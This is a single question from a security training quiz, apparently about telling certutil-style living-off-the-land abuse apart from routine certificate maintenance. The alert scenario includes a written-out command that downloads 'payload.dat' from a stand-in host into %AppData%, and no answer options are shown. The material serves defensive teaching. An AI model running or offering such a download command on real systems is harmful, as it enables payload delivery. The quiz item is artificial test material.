Quiz 2 Question 6 of 20

An EDR alert shows a signed Microsoft certificate utility running on a standard user workstation. The command line includes -urlcache -split -f http://example[.]xyz/payload.dat and writes to %AppData%. Routine certificate maintenance is scheduled nightly by an admin service. Which finding most strongly indicates malicious abuse of a living-off-the-land binary rather than legitimate administration?

Select an answer to reveal the explanation.

Motivation